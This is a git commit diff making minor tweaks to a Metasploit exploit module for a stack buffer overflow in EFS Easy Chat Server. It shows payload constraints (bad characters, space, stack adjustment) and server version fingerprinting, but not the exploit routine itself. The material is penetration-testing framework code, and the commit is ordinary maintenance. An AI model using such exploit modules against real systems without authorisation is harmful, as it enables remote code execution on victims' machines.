minor tweaks

git-svn-id: file:///home/svn/framework3/trunk@9697 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-07-06 22:15:16 +00:00
parent 8c0e5fdf73
commit ac267c5856
1 changed files with 5 additions and 6 deletions

View File

@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'EFS Easy Chat Server Authentication Request Handling Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in EFS Software Easy Chat Server. By
This module exploits a stack buffer overflow in EFS Software Easy Chat Server. By
sending a overly long authentication request, an attacker may be able to execute
arbitrary code.
@ -46,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
'BadChars' => "\x00\x0a\x0b\x0d\x20\x23\x25\x26\x2b\x2f\x3a\x3f\x5c",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
@ -59,7 +59,6 @@ class Metasploit3 < Msf::Exploit::Remote
register_options(
[
Opt::RPORT(80),
OptString.new('PATH', [ true, "Installation path of Easy Chat Server",
"C:\\Program Files\\Easy Chat Server" ])
], self.class )
@ -67,11 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote
def auto_target
info = http_fingerprint
t = nil
# NOTE: Version 2.2 still reports "1.0" in the "Server" header
if (info =~ /Easy Chat Server\/1\.0/)
t = targets[0]
return targets[0]
end
t
nil
end
def check